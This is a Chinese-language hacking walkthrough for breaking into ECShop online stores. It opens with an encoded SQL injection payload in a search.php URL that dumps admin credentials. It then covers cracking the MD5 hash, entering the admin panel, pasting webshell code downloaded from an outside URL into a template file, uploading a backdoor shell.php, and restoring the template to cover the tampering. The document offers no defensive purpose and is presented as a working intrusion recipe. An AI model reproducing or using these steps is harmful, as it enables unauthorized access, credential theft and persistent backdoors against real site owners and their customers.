1. search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319

复制代码 

3.管理员帐号与密码出来了，如图:用户名是 admin, md5加密后的密码是 ff34aafa01405a2277ca6d90eaa72c94 

4.下来我们使用 http://www.c0llision.net/webcrack.php 来破解md5加密后的密码 

5.密码破解出来后，我们就可以使用该用户名以及密码登录ecshop后台了，ecshop后台目录是 http://目标/admin
 

6. 进入后台后，电击左边menu里的 模板管理>库项目管理 ， 然后选择 myship.lbi
 

7. 然后把以下文件的代码复制进去
https://sites.google.com/site/wming79/shell.php?attredirects=0&d=1 

8. 访问 http://目标/myship.php, 登录密码: 12345
 

9. 登录后,点击images或者data目录
 

10. 上传我们的后门webshell: shell.php
 

11. 上传成功后，尝试访问后门，http://目标/images/shell.php 又或者 http://目标/的data/shell.php
 

12. 下来记得要还原我们修改的模板文件,点击 还原到上一次修改， 然后点击确定
 

13. 之后就自由发挥吧